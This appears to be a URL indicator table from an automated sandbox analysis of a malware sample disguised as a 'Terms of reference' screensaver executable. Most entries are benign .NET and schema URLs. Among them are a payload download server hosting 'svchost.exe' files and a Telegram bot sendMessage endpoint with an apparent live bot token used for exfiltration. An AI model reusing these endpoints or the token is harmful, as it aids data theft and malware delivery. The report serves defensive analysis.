http://schemas.datacontract.org/2004/07/SystemV | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://html4/loose.dtd | Terms_of_reference_06_01_2025_samsung.scr.exe | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005 | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp | false | | high
https://api.telegram.org | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://schemas.datacontract.org | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200 | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp | false | | high
https://aka.ms/dotnet/info | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://89.23.97.214/TeamBuild/win64_svchost.exeh | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/dotnet/app-launch-failed | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp | false | | high
http://schemas.datacontract.org/2004/07/System.Xml | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp | false | | high
http://.css | Terms_of_reference_06_01_2025_samsung.scr.exe | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20 | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp | false | | high
https://aka.ms/dotnet-core-applaunch? | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp | false | | high
https://github.com/dotnet/runtime | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159462177.0000025773990000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159219363.0000025773920000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160308073.00000298086B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164582542.000002980B9F1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168744151.000002980CA01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165424131.000002980BAD0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166578673.000002980BD50000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165031754.000002980BA61000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160289396.00000298086A1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160570585.00000298087E0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159537261.00000257739B1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160343247.00000298086C1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160412636.0000029808700000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165358680.000002980BAC0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160552630.00000298087D1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://api.telegram.org:443/ | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577649F000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.00000257764A9000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://ip-api.com:80/ | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://aka.ms/dotnet-warnings/ | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164165214.000002980B870000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162093744.0000029809240000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://crl.microso | powershell.exe, 00000002.00000002.2168143247.0000029BCDA86000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ip-api.com/json/ | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp | false | | high
https://aka.ms/nativeaot-compatibility | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp | false | | high
https://github.com/dotnet/runtime/issues/71847 | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp | false | | high
http://ip-api.com/json/8.46.123.189 | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://aka.ms/serializationformat-binary-obsolete | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CB6000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2153023770.0000029BC5704000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F710074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F7101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.ipify.org/ | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://aka.ms/binaryformatter | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CB6000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmp | false | | high
http://crl.micft.cMicRosof | powershell.exe, 00000009.00000002.2239299222.0000014440981000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/mono/linker/pull/649 | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162093744.0000029809240000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2107852680.0000029BB5691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2110018131.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440AA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://.jpg | Terms_of_reference_06_01_2025_samsung.scr.exe | false | | high
https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessageh | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577649F000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.00000257764A9000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier | Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp | false
                                                                                        high
                                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2153023770.0000029BC5704000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F710074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F7101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://89.23.97.214:80/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776479000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2107852680.0000029BB58B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.datacontract.org/2004/07/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162093744.0000029809240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://aka.ms/dotnet/download%s%sInstallTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://go.micropowershell.exe, 00000004.00000002.2110018131.000001F700C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://exslt.org/commonTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://crl.micpowershell.exe, 00000009.00000002.2239299222.0000014440981000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://contoso.com/Iconpowershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.datacontract.org/2004/07/System.Runtime.SerializationTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://aka.ms/dotnet-illink/comTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/localityTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.datacontract.org/2004/07/NETdesign.Plugin.NotiferTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://api.ipify.org:80/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://ip-api.com/json/8Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://aka.ms/dotnet-illink/nativehosttTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://89.23.97.214/TeamBuild/win32_svchost.exeTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    unknown
                                                                                                                                    http://api.ipify.orgTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/mono/linker/issues/378Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://api.ipify.orgnotification_sent.flagTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://aka.ms/dotnet/sdk-not-foundProbingTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.oTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/wsdl/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2107852680.0000029BB58B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://wTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://schemas.datacontract.org/2004/07/System.Xml.LinqTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://89.23.97.214/TeamBuild/win32_svchost.exehttp://89.23.97.214/TeamBuild/win64_svchost.exewin32_Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://github.com/dotnet/linker/issues/2715.Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167776836.000002980C420000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166830112.000002980BDC1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/dotnet/runtime/issues/50820Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://aka.ms/GlobalizationInvariantModeTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.datacontract.org/2004/07/System.IOTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.2107852680.0000029BB5691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2110018131.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://pastebin.compowershell.exe, 00000004.00000002.2110018131.000001F7015DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://pastebin.compowershell.exe, 00000004.00000002.2110018131.000001F700C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://aka.ms/dotnet-illink/nativehostTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://aka.ms/dotnet/downloadTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://schemas.datacontract.org/2004/07/SystemYTerms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                http://crl.microspowershell.exe, 00000009.00000002.2338412059.0000014458E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
IP               Domain            Country             ASN    ASN Name         Malicious
